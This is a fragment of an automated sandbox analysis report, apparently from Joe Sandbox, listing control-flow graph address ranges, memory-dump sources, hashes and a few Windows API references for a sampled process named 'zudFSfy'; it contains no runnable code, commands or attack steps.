                                                                                                                                                                                                                                          control_flow_graph 1988 5ac79f8-5ac7a0a 1989 5ac7a0c-5ac7a2d 1988->1989 1990 5ac7a34-5ac7a38 1988->1990 1989->1990 1991 5ac7a3a-5ac7a3c 1990->1991 1992 5ac7a44-5ac7a53 1990->1992 1991->1992 1994 5ac7a5f-5ac7a8b 1992->1994 1995 5ac7a55 1992->1995 1998 5ac7cb8-5ac7cff 1994->1998 1999 5ac7a91-5ac7a97 1994->1999 1995->1994 2028 5ac7d15-5ac7d21 1998->2028 2029 5ac7d01 1998->2029 2000 5ac7a9d-5ac7aa3 1999->2000 2001 5ac7b69-5ac7b6d 1999->2001 2000->1998 2003 5ac7aa9-5ac7ab6 2000->2003 2004 5ac7b6f-5ac7b78 2001->2004 2005 5ac7b90-5ac7b99 2001->2005 2007 5ac7abc-5ac7ac5 2003->2007 2008 5ac7b48-5ac7b51 2003->2008 2004->1998 2009 5ac7b7e-5ac7b8e 2004->2009 2010 5ac7bbe-5ac7bc1 2005->2010 2011 5ac7b9b-5ac7bbb 2005->2011 2007->1998 2014 5ac7acb-5ac7ae3 2007->2014 2008->1998 2015 5ac7b57-5ac7b63 2008->2015 2013 5ac7bc4-5ac7bca 2009->2013 2010->2013 2011->2010 2013->1998 2016 5ac7bd0-5ac7be3 2013->2016 2017 5ac7aef-5ac7b01 2014->2017 2018 5ac7ae5 2014->2018 2015->2000 2015->2001 2016->1998 2021 5ac7be9-5ac7bf9 2016->2021 2017->2008 2027 5ac7b03-5ac7b09 2017->2027 2018->2017 2021->1998 2023 5ac7bff-5ac7c0c 2021->2023 2023->1998 2026 5ac7c12-5ac7c27 2023->2026 2026->1998 2039 5ac7c2d-5ac7c50 2026->2039 2030 5ac7b0b 2027->2030 2031 5ac7b15-5ac7b1b 2027->2031 2034 5ac7d2d-5ac7d49 2028->2034 2035 5ac7d23 2028->2035 2032 5ac7d04-5ac7d06 2029->2032 2030->2031 2031->1998 2036 5ac7b21-5ac7b45 2031->2036 2037 5ac7d08-5ac7d13 2032->2037 2038 5ac7d4a-5ac7d77 call 5ac2810 2032->2038 2035->2034 2037->2028 2037->2032 2050 5ac7d8f-5ac7d91 2038->2050 2051 5ac7d79-5ac7d7f 2038->2051 2039->1998 2045 5ac7c52-5ac7c5d 2039->2045 2048 5ac7cae-5ac7cb5 2045->2048 2049 5ac7c5f-5ac7c69 2045->2049 2049->2048 2055 5ac7c6b-5ac7c81 2049->2055 2074 5ac7d93 call 5ac8bb0 2050->2074 2075 5ac7d93 call 5ac7e00 2050->2075 2076 5ac7d93 call 5ac7e10 2050->2076 2052 5ac7d81 2051->2052 2053 5ac7d83-5ac7d85 2051->2053 2052->2050 2053->2050 2060 5ac7c8d-5ac7ca6 2055->2060 2061 5ac7c83 2055->2061 2056 5ac7d99-5ac7d9d 2057 5ac7d9f-5ac7db6 2056->2057 2058 5ac7de8-5ac7df8 2056->2058 2057->2058 2066 5ac7db8-5ac7dc2 2057->2066 2060->2048 2061->2060 2069 5ac7dc4-5ac7dd3 2066->2069 2070 5ac7dd5-5ac7de5 2066->2070 2069->2070 2074->2056 2075->2056 2076->2056
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq$d
                                                                                                                                                                                                                                          • API String ID: 0-3334038649
                                                                                                                                                                                                                                          • Opcode ID: 717d709be15d50a42508e2e2b099e3a12ab169312ea5ee79dcad972f6f7cc243
                                                                                                                                                                                                                                          • Instruction ID: e57da76dd676ccbe7a726cd6257b02bce0c1361bdd9639c70bf9e626f1f03fd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 717d709be15d50a42508e2e2b099e3a12ab169312ea5ee79dcad972f6f7cc243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0D129356006068FCB15DF29C584D6ABBF2FF88310B5589ADE46A9B365DB30F846CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2077 5ac8780-5ac87b7 2079 5ac87b9-5ac87bb 2077->2079 2080 5ac8805-5ac881f 2077->2080 2081 5ac87bd-5ac87c7 2079->2081 2082 5ac87d7-5ac87db 2079->2082 2094 5ac8829-5ac8838 2080->2094 2095 5ac8821-5ac8827 2080->2095 2084 5ac87cd-5ac87d1 2081->2084 2085 5ac8ae7-5ac8b0b 2081->2085 2086 5ac87dd-5ac87e3 2082->2086 2087 5ac87ff-5ac8803 2082->2087 2084->2082 2088 5ac8955-5ac8958 2084->2088 2100 5ac8b0d-5ac8b19 2085->2100 2086->2085 2089 5ac87e9-5ac87f6 2086->2089 2087->2079 2087->2080 2088->2085 2090 5ac895e-5ac89d6 2088->2090 2089->2087 2097 5ac87f8 2089->2097 2108 5ac89dd-5ac8a25 2090->2108 2099 5ac883e-5ac8877 2094->2099 2094->2108 2095->2099 2097->2087 2126 5ac8879-5ac8880 2099->2126 2127 5ac8887-5ac889c 2099->2127 2101 5ac8b79-5ac8b7d 2100->2101 2102 5ac8b1b-5ac8b21 2100->2102 2101->2100 2104 5ac8b7f-5ac8b86 2101->2104 2106 5ac8b87-5ac8bad 2102->2106 2107 5ac8b23-5ac8b2a 2102->2107 2107->2106 2110 5ac8b2c-5ac8b32 2107->2110 2138 5ac8a2c-5ac8a62 2108->2138 2115 5ac8b34-5ac8b3f 2110->2115 2116 5ac8b73-5ac8b77 2110->2116 2115->2106 2117 5ac8b41-5ac8b4b 2115->2117 2116->2101 2116->2102 2117->2106 2121 5ac8b4d-5ac8b6c 2117->2121 2121->2116 2126->2127 2129 5ac8882-5ac8884 2126->2129 2127->2138 2139 5ac88a2-5ac88c3 2127->2139 2129->2127 2159 5ac8a69-5ac8a8d 2138->2159 2145 5ac88f4-5ac8904 2139->2145 2146 5ac88c5-5ac88d2 2139->2146 2152 5ac8928 2145->2152 2153 5ac8906-5ac8926 2145->2153 2150 5ac88d4-5ac88e0 2146->2150 2151 5ac88e2 2146->2151 2155 5ac88e7-5ac88ea 2150->2155 2151->2155 2156 5ac892a-5ac893f 2152->2156 2153->2156 2155->2159 2160 5ac88f0 2155->2160 2157 5ac894b-5ac8952 2156->2157 2158 5ac8941-5ac8945 2156->2158 2158->2157 2162 5ac8a94-5ac8ae0 2158->2162 2159->2162 2160->2145 2162->2085
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Hbq$Hbq
                                                                                                                                                                                                                                          • API String ID: 0-4258043069
                                                                                                                                                                                                                                          • Opcode ID: 2ef691c739bc2cd06d2cb936d5ea2b75e4b543546063e4cb307d61efcc3b5687
                                                                                                                                                                                                                                          • Instruction ID: 23cce3ff64f624aefbc2d1529fcc22682838c3f17095cba13b83690188b9cc17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef691c739bc2cd06d2cb936d5ea2b75e4b543546063e4cb307d61efcc3b5687
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEC18F346005169FCB04DF29C480E6EBBF2FF88314F1585A8E8199B3A5DB34EC46CB95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                          • API String ID: 0-2697143702
                                                                                                                                                                                                                                          • Opcode ID: e15d469f16025603b6279ce5e3eed1feb445fcdcf198c5afea412a682cb88319
                                                                                                                                                                                                                                          • Instruction ID: 3ed919afd3b3b19ba4473961bac1d0078c40aa088519fe40ee4df8fc7264549f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e15d469f16025603b6279ce5e3eed1feb445fcdcf198c5afea412a682cb88319
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C18874B00218DFCB04DFA4D994E9DBBB2BF89304F514199E516AB3A5DB71EC42CB50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                          • API String ID: 0-2697143702
                                                                                                                                                                                                                                          • Opcode ID: 37c47a16de15df30f8649f03e5b9b8b723ce498b394c3e13f4f8749fda2133fb
                                                                                                                                                                                                                                          • Instruction ID: 971617c65412389194cd5262b1a58f0aad5809efc935a99047d2312e2153256b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37c47a16de15df30f8649f03e5b9b8b723ce498b394c3e13f4f8749fda2133fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4B19974B00218DFCB08DFA4D994EADBBB2BF89304F5041A9D516AB3A5DB71ED42CB50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2367 5ac2e68-5ac2e7a 2368 5ac2f6e-5ac2f93 2367->2368 2369 5ac2e80-5ac2e82 2367->2369 2371 5ac2f9a-5ac2fbe 2368->2371 2370 5ac2e88-5ac2e94 2369->2370 2369->2371 2376 5ac2ea8-5ac2eb8 2370->2376 2377 5ac2e96-5ac2ea2 2370->2377 2382 5ac2fc5-5ac2fe9 2371->2382 2376->2382 2383 5ac2ebe-5ac2ecc 2376->2383 2377->2376 2377->2382 2387 5ac2ff0-5ac3063 2382->2387 2383->2387 2388 5ac2ed2-5ac2ed9 call 5ac3068 2383->2388 2390 5ac2edf-5ac2f28 2388->2390 2405 5ac2f2a-5ac2f43 2390->2405 2406 5ac2f4b-5ac2f6b call 5ac1610 2390->2406 2405->2406
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq$Hbq
                                                                                                                                                                                                                                          • API String ID: 0-4081012451
                                                                                                                                                                                                                                          • Opcode ID: fc66678d2946c07a75706941c16f43ad7299f120dcff929c1282f938dbb8a16c
                                                                                                                                                                                                                                          • Instruction ID: 6a84dd2a2626eced8b7cdca2212413da52e2002ea02b83e7409b58114a4278a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc66678d2946c07a75706941c16f43ad7299f120dcff929c1282f938dbb8a16c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D5167387002148FC719EF28C464A6EBBB6FFC920176545ACE9469B3A1CF35EC06CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2464 5aef790-5aef79f 2465 5aef8b8-5aef8dd 2464->2465 2466 5aef7a5-5aef7b1 2464->2466 2470 5aef8e4-5aef956 2465->2470 2469 5aef7b7-5aef7bf 2466->2469 2466->2470 2475 5aef7ca-5aef7ce 2469->2475 2477 5aef7d0-5aef7df 2475->2477 2478 5aef7e1-5aef7f8 2475->2478 2477->2478 2485 5aef7fa 2478->2485 2486 5aef802-5aef804 2478->2486 2487 5aef7fc-5aef800 2485->2487 2488 5aef806 2485->2488 2489 5aef80b-5aef818 2486->2489 2487->2486 2487->2488 2488->2489 2490 5aef81a-5aef81e 2489->2490 2491 5aef820-5aef823 2489->2491 2493 5aef826-5aef82e 2490->2493 2491->2493 2494 5aef83a 2493->2494 2495 5aef830-5aef838 2493->2495 2497 5aef83e-5aef89d 2494->2497 2495->2497 2500 5aef89f-5aef8a9 2497->2500 2501 5aef8b1-5aef8b5 2497->2501 2500->2501
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499654332.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ae0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq$Hbq
                                                                                                                                                                                                                                          • API String ID: 0-4081012451
                                                                                                                                                                                                                                          • Opcode ID: 323fcb183068d6845f475dd82c39cc85cc35c639639ed8af254889281edf4efa
                                                                                                                                                                                                                                          • Instruction ID: f22ebef8b32294ff9ece781338b4d384b9cd2ac99e11bb47df82bd6cfca0facf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 323fcb183068d6845f475dd82c39cc85cc35c639639ed8af254889281edf4efa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A41DF352047408FD325DF2AC590B5ABFF2FF84310F148A69D4968B7A5DB74E889CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2503 5ac91e2-5ac9254 2508 5ac925a-5ac926c 2503->2508 2509 5ac93d2-5ac943e 2503->2509 2512 5ac92bc-5ac9305 2508->2512 2513 5ac926e-5ac92ba 2508->2513 2521 5ac968d-5ac9694 2509->2521 2522 5ac9444-5ac944d 2509->2522 2541 5ac9308-5ac931c 2512->2541 2513->2541 2525 5ac944f-5ac9453 2522->2525 2526 5ac94c3-5ac94dc 2522->2526 2529 5ac946c-5ac9478 2525->2529 2530 5ac9455-5ac946a 2525->2530 2538 5ac9609-5ac9619 2526->2538 2539 5ac94e2 2526->2539 2531 5ac9481-5ac94be 2529->2531 2530->2531 2531->2521 2547 5ac961b-5ac9630 2538->2547 2548 5ac9632-5ac963e 2538->2548 2542 5ac94e9-5ac952c 2539->2542 2543 5ac9579-5ac95bc 2539->2543 2544 5ac9531-5ac9574 2539->2544 2545 5ac95c1-5ac9604 2539->2545 2549 5ac9327-5ac9348 2541->2549 2542->2521 2543->2521 2544->2521 2545->2521 2554 5ac9647-5ac9688 2547->2554 2548->2554 2559 5ac934a-5ac9350 2549->2559 2560 5ac9352-5ac935c 2549->2560 2554->2521 2561 5ac935f-5ac93a2 2559->2561 2560->2561 2568 5ac93c8-5ac93cf 2561->2568 2569 5ac93a4-5ac93c0 2561->2569 2569->2568
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'^q$pbq
                                                                                                                                                                                                                                          • API String ID: 0-3872760177
                                                                                                                                                                                                                                          • Opcode ID: b5bf8c13b524c16814dc9854023879acfdfd63afaefd36df2698b669876453ae
                                                                                                                                                                                                                                          • Instruction ID: 85c8863ad3b851d7e5014edda892e0bdd1c7274b21c3c6f27b9f550bc3e4e117
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5bf8c13b524c16814dc9854023879acfdfd63afaefd36df2698b669876453ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C341AF31A403059FC715DB68C990BAFBBF7EF88304F14896CC0499B3A9DB71E94687A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq$Hbq
                                                                                                                                                                                                                                          • API String ID: 0-4081012451
                                                                                                                                                                                                                                          • Opcode ID: a38bbb0568fbc5a3d02a3932a361cd385b1f3b04baa0d412a717476511a802ee
                                                                                                                                                                                                                                          • Instruction ID: f2d66701d80823084699d78453f707ff0ff02874605aa41f7b3c076b93d4e4ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a38bbb0568fbc5a3d02a3932a361cd385b1f3b04baa0d412a717476511a802ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 412100313082444FC705EB69C940AAEBFE6EBC9300B2441BAD405CF3A1DE35ED068791
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2501415874.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ec0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                          • API String ID: 0-1178188002
                                                                                                                                                                                                                                          • Opcode ID: 528965ed671be7256e956ed2938e71907978b0b52d7c9b30ae625352e95808d6
                                                                                                                                                                                                                                          • Instruction ID: 36a0272bf0d1b886161b0fac4777cba755a7c3c7a954502d98cce2a04101a5d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 528965ed671be7256e956ed2938e71907978b0b52d7c9b30ae625352e95808d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1725DB8A552289FCB54DF24DCA5AADBBB1EF86301F9041E9D44DAB350DE316E81CF04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000), ref: 05AD9C9E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499594892.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ad0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                          • Opcode ID: 7771e8582f34a4b27840f6ab11e457186d638cf06b486fc8a937f81f44475676
                                                                                                                                                                                                                                          • Instruction ID: bb2b71952aaef36937d700a8b008c074f09204cc157875f8ea0c216dd8288ec1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7771e8582f34a4b27840f6ab11e457186d638cf06b486fc8a937f81f44475676
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E92144B58043898FDB20DFA9C449BDEBFF0AB09314F24845AD45AA7350C778A584CFA1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (_^q
                                                                                                                                                                                                                                          • API String ID: 0-538443824
                                                                                                                                                                                                                                          • Opcode ID: 32d4d35ef7a59a1b34802d97910a5c96348c3e7d3db23b51cb608059b2bb19f7
                                                                                                                                                                                                                                          • Instruction ID: 1b12c360a57596a5811a365d2e16fa4b8f6050785c67dffa3bc50531e9779afb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32d4d35ef7a59a1b34802d97910a5c96348c3e7d3db23b51cb608059b2bb19f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF225B39B002049FDB14DF64D5A4AA9BBF2FF88311F1581A9E9069F3A5CA71EC41CB54
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ,bq
                                                                                                                                                                                                                                          • API String ID: 0-2474004448
                                                                                                                                                                                                                                          • Opcode ID: 59c9a9101acb65dafbbe298c149d2b99764637db7d1b1d6fb9224579b81743f3
                                                                                                                                                                                                                                          • Instruction ID: 424e7d0409f19e2d7eefe385a48c5ab1e8ec6d91c6cff878adea40d9ce41994b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59c9a9101acb65dafbbe298c149d2b99764637db7d1b1d6fb9224579b81743f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20E1D275A042288FCB64CF69C981BEDBBF2BB88300F5541D9E549AB351DB309E81CF61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 031DA024
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2486282890.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_31d0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: a13e9e3b5cd806dd2b99376c3f46245802d911f59f08dc91ffff7bdba05b11f0
                                                                                                                                                                                                                                          • Instruction ID: aea78965dc4214dc0f4650f74629ca813b1f5b808b6dd1fd91a9633104fa0d6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a13e9e3b5cd806dd2b99376c3f46245802d911f59f08dc91ffff7bdba05b11f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 861106B1D002499FCB10DFAAC484AEEFBF4FF48324F14842AD459A7250C775A944CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000), ref: 05AD9C9E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499594892.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ad0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                          • Opcode ID: 8539ff68f840ec814f95149288e7fe6f073d01db6470fb22dae6969430ea4e23
                                                                                                                                                                                                                                          • Instruction ID: 3a27a0161798a5be5b06257127e980b46825f5f4b276fac2709e329657d9f1f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8539ff68f840ec814f95149288e7fe6f073d01db6470fb22dae6969430ea4e23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 092130B48003598FDB20DF9AC049BDEFFF4AB08318F24841AE55AA7350C779A584CFA1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (bq
                                                                                                                                                                                                                                          • API String ID: 0-149360118
                                                                                                                                                                                                                                          • Opcode ID: 1d8807b91aafeb7e5c67d03751bee267858aae34a9dfbf0d640fdf67d2fb953e
                                                                                                                                                                                                                                          • Instruction ID: 1837373dd15bee6009da256c7cb45623a21f7c95d8180cb70dd3ace501def349
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8807b91aafeb7e5c67d03751bee267858aae34a9dfbf0d640fdf67d2fb953e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CA18C35304204DFD71A9F68D954E2A7FB6FF89310F1580A9E1568B3A2CB36EC42DB51
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499654332.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ae0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Deq
                                                                                                                                                                                                                                          • API String ID: 0-948982800
                                                                                                                                                                                                                                          • Opcode ID: 75fd989ad732829252e7adf8f32341d4e856265eb28a77d657578ab96fb82b70
                                                                                                                                                                                                                                          • Instruction ID: 90215c6338e433e0e5d271d7810085b400455a027e57e8bee12249014e2b4821
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75fd989ad732829252e7adf8f32341d4e856265eb28a77d657578ab96fb82b70
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09A19D34B002149FCB14DF29D694E6ABBFAFF89710F1585A9E4459B3A1DB36EC01CB90
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Pl^q
                                                                                                                                                                                                                                          • API String ID: 0-2831078282
                                                                                                                                                                                                                                          • Opcode ID: fcfd85f845216ff975a9545d1530be4bcebe8b9f1ea480e0ad76173c1d443fa8
                                                                                                                                                                                                                                          • Instruction ID: a205654e764d25b8c61636af73ac39e321c4cca2809bb83f235fc3daf2026338
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcfd85f845216ff975a9545d1530be4bcebe8b9f1ea480e0ad76173c1d443fa8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47912234B402188FCB15DF28C494EAA7BF6BF89711B1540A9E516CB3B5DB71EC42CBA1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2499483568.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_5ac0000_zudFSfy.jbxd
